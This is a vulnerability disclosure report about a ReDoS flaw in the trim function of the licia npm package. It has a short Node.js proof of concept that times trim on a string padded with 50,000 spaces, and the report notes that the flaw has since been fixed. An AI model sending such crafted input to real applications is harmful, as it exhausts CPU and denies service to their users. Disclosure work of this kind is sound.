Inefficient Regular Expression Complexity in liriliri/licia

Valid

Reported on

Jul 18th 2021

✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the licia package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.

Similar to https://nvd.nist.gov/vuln/detail/CVE-2020-28500

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// PoC.js
var l = require('licia');

function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}

return ret + "1";
}

var s = build_blank(50000)
var time = Date.now();
l.trim(s)
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)

Execute the following in terminal:

npm i licia
node poc.js

Check the Output:

time_cost: 2269

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. 📍 Location trim.js#L26

We have contacted a member of the liriliri/licia team and are waiting to hear back 2 years ago
ready-research modified the report
2 years ago
RedHoodSu marked this as fixed with commit 10006a 2 years ago
RedHoodSu has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation